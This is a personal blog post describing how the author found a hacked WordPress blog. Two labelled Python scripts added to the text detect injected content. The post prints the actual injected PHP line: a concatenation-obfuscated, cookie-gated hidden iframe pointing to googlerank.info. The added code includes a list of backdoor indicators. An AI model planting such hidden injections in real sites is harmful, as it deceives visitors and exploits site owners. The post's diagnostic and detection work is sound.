Nasty little spammers
Today I thought I’d give the WordPress iPhone app a try since I’m going to try to blog more frequently in the near future. I was slightly irritated that it didn’t work, but I assumed that there was some kind of bug in the system that was preventing it from working with my blog.
After using my best google-fu I couldn’t find anything that would prevent me from adding the basic settings and so I downloaded a trial version of MarsEdit to see if that also choked on my site.
Unfortunately my hunch was proven correct and I couldn’t make MarsEdit connect to my blog.
Since I’ve written XML-RPC client and server code in the past I fired up TextMate and iPython to see if I could diagnose the problem.
I turned on pdb debugging, set up an xmlrpclib.Server instance and tried to call the demo.sayHello() method which resulted in an instant exception. The data that the server returned worried me immensely:
<iframe src=http://googlerank.info/counter style=display:none></iframe> <script language="JavaScript" type="text/javascript">document.cookie = "ireiw=5;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";</script><?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<string>Hello!</string>
</value>
</param>
</params>
</methodResponse>
That, my friends, is the result of a hacked WordPress installation. This irked me. A lot. Not only are these bastards not content with flooding every post on my blog with spam comments and trackbacks (which has caused me to turn off comments on my older posts, something I really didn’t want to do), they’ve gone and invaded my server to make themselves a little more money. The only reason I actually found this was because of the invalid markup for the XML-RPC response, had I never tried to use XML-RPC I wouldn’t have seen it for reasons that I’ll explain below.
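Here is the symptom above turned into a check you can run against any xmlrpc.php. This is an added example, not code from the original post or from WordPress; the reply it parses is a constructed copy of the tainted response shown above, and the rule it assumes is that a clean XML-RPC reply begins with the XML declaration, so anything in front of `<?xml` was emitted by injected code running before WordPress writes its own output.

```python
import xmlrpc.client

# Constructed sample modelled on the tainted reply quoted above: injected
# HTML/JS first, then the real methodResponse for demo.sayHello().
TAINTED_REPLY = (
    '<iframe src=http://googlerank.info/counter style=display:none></iframe> '
    '<script language="JavaScript" type="text/javascript">'
    'document.cookie = "ireiw=5;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";'
    '</script>'
    '<?xml version="1.0"?>\n'
    '<methodResponse>\n<params>\n<param>\n<value>\n'
    '<string>Hello!</string>\n'
    '</value>\n</param>\n</params>\n</methodResponse>\n'
)


def parses_as_xmlrpc(body: str) -> bool:
    """True if the whole body is a well-formed XML-RPC packet.

    Any parse failure counts as 'not clean': a leading HTML fragment makes
    expat reject the document before it ever reaches <methodResponse>.
    """
    try:
        xmlrpc.client.loads(body)
        return True
    except Exception:  # ExpatError, ResponseError, Fault, ...
        return False


def split_injected_prefix(body: str):
    """Split a reply into (injected_prefix, xml_document).

    Assumed rule: a reply from xmlrpc.php must start with the XML declaration
    (after an optional BOM or whitespace). Whatever sits in front of it was
    written by code that ran before WordPress produced its own output.
    """
    idx = body.find('<?xml')
    if idx == -1:
        raise ValueError('no XML declaration in reply')
    prefix = body[:idx].strip('\ufeff \t\r\n')
    return prefix, body[idx:]


def audit_reply(body: str) -> dict:
    """Return the decoded params plus any injected prefix.

    'injected' is empty for a healthy server. A stray blank line before
    <?php in some plugin file also breaks parsing but strips to '', so it
    is reported as harmless; real injected markup survives the strip.
    """
    if parses_as_xmlrpc(body):
        params, _ = xmlrpc.client.loads(body)
        return {'injected': '', 'params': params}
    prefix, xml_doc = split_injected_prefix(body)
    params, _ = xmlrpc.client.loads(xml_doc)
    return {'injected': prefix, 'params': params}


if __name__ == '__main__':
    report = audit_reply(TAINTED_REPLY)
    if report['injected']:
        print('INJECTED CONTENT AHEAD OF XML:', report['injected'][:70], '...')
    else:
        print('reply is clean')
    print('server said:', report['params'])
```

To use it against a live site, fetch `http://yourblog/xmlrpc.php` with a POST body calling `demo.sayHello` and hand the raw response text to `audit_reply`; the point is that the injection shows up in the bytes of every page the server emits, and XML-RPC is just the one consumer strict enough to complain about it.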
So, now I had to trawl through my WordPress files to see where this invasion was taking place. I checked my database first which came back clean, followed by my themes and plugins. I hit paydirt in both of these places. One was a simple modification to the footer.php of my K2 theme (which wasn’t active so it didn’t really matter) and one was a not so simple modification to my markdown plugin.
Searching through the source for “iframe” or “googlerank.info” revealed nothing, but that’s because the spammer had added the string as follows:
if (!isset($_COOKIE["ireiw"])) echo '<if'.'rame src=http://googl'.'erank.info/counter style=display:none'.'></ifra'.'me> <s'.'cr'.'ipt language="JavaScr'.'ipt" '.'type="text/'.'javascript">d'.'ocument.cookie '.'= "ireiw=5;expires=Sun, 0'.'1-Dec-2009 08:00:00 GMT;path='.'/";<'.'/script>';
Assholes. So this hidden iframe would only be shown if a cookie had not already been set for the user, meaning it would only be shown once, as often as they used a different browser, or as often as they cleared their cookies. For this reason I never noticed it on my site’s main pages, but I’ll bet any search spiders saw it every damn time.
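A scanner for exactly this trick, added here as an example and not something from the original post or from WordPress: it folds runs of dot-joined single-quoted PHP literals back into one string before matching, so the split-up `googlerank.info` becomes visible to the same search that missed it above. The sample PHP file is constructed around the line just shown; the `eval()` and `base64_decode()` indicators are assumed generic backdoor tells, not something the post reports finding on its own site.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample: the concatenation-obfuscated echo from the plugin,
# wrapped in a PHP file so the scanner has something realistic to walk.
INJECTED_PHP = r"""<?php
function markdown_footer() {
if (!isset($_COOKIE["ireiw"])) echo '<if'.'rame src=http://googl'.'erank.info/counter style=display:none'.'></ifra'.'me> <s'.'cr'.'ipt language="JavaScr'.'ipt" '.'type="text/'.'javascript">d'.'ocument.cookie '.'= "ireiw=5;expires=Sun, 0'.'1-Dec-2009 08:00:00 GMT;path='.'/";<'.'/script>';
}
"""

# Constructed clean file: ordinary concatenation must not be flagged.
CLEAN_PHP = r"""<?php
function markdown_footer() {
    echo '<p class="credit">' . 'Rendered with Markdown' . '</p>';
}
"""

# One single-quoted PHP literal (handles \' and \\ escapes) ...
_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")
# ... and a run of two or more of them joined with PHP's '.' operator.
_CONCAT_RUN = re.compile(r"'(?:[^'\\]|\\.)*'(?:\s*\.\s*'(?:[^'\\]|\\.)*')+")


def fold_concats(src: str) -> str:
    """Rewrite 'ab'.'cd' runs as 'abcd' so the literal text becomes greppable."""
    return _CONCAT_RUN.sub(
        lambda m: "'" + "".join(_LITERAL.findall(m.group(0))) + "'", src)


# Indicators run over the folded source. The first three are the payload
# from the post; the last two are assumed generic tells (eval/base64 loaders).
INDICATORS = [
    ('hidden iframe', re.compile(r"<iframe\b[^>]*display\s*:\s*none", re.I)),
    ('googlerank.info', re.compile(r"googlerank\.info", re.I)),
    ('cookie-gated payload', re.compile(r"document\.cookie", re.I)),
    ('eval()', re.compile(r"\beval\s*\(", re.I)),
    ('base64_decode()', re.compile(r"\bbase64_decode\s*\(", re.I)),
]


def naive_grep(src: str) -> list:
    """What a plain grep over the file sees: the obfuscated text as written."""
    return [name for name, rx in INDICATORS if rx.search(src)]


def scan_source(src: str) -> list:
    """Indicator names that hit once the concatenations are folded."""
    return naive_grep(fold_concats(src))


def scan_tree(root: Path) -> dict:
    """Map each .php file under root to its indicator hits (clean files omitted)."""
    hits = {}
    for path in sorted(root.rglob('*.php')):
        try:
            src = path.read_text(errors='replace')
        except OSError:
            continue
        found = scan_source(src)
        if found:
            hits[str(path.relative_to(root))] = found
    return hits


if __name__ == '__main__':
    # Build a throwaway wp-content tree with one infected and one clean plugin.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        plugins = root / 'wp-content' / 'plugins'
        (plugins / 'markdown').mkdir(parents=True)
        (plugins / 'markdown' / 'markdown.php').write_text(INJECTED_PHP)
        (plugins / 'clean.php').write_text(CLEAN_PHP)
        for path, found in scan_tree(root).items():
            print(path, '->', ', '.join(found))
```

This is a regex heuristic, not a PHP tokenizer: double-quoted strings, heredocs, `chr()` arithmetic and `str_rot13`/gzip-wrapped loaders will slip past it, and an attacker who has read this post will pick one of those next time. The dependable check is still a diff of wp-content and wp-includes against pristine copies of the plugin, theme and WordPress release archives, with this scanner as a quick first pass over anything that differs.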
I have no idea when this act was perpetrated, nor which exploit they used, but I’m mighty pissed. In my opinion this is tantamount to breaking into my house and rummaging around through my shit just to take a jar full of £3.07 worth of change; it feels pointless and violating and I really wish the internet weren’t so anonymous so there was actually some risk of being found out if you’re one of these dirty, low-down fucks who make money by ruining people’s (virtual) reputation.
Now I’m turning off XML-RPC and uninstalling the WordPress iPhone app because I really don’t want to be open to yet more possible exploits. Well done spammers. Another feature of my blogging software that I can’t rely on because you’re all unscrupulous asshats. Bravo.
Update (28 July 08): As Daniel pointed out in the comments to this post, I’m not 100% sure that XML-RPC was to blame for my blog being hacked and blaming it wholly for the issue was simply a case of a slightly irate post very soon after I fixed the issue. In the interest of not spreading FUD I need to clear that up.
Currently I cannot find anything about any current XML-RPC exploits in WordPress 2.6 so if you’re up to date there shouldn’t be any problems.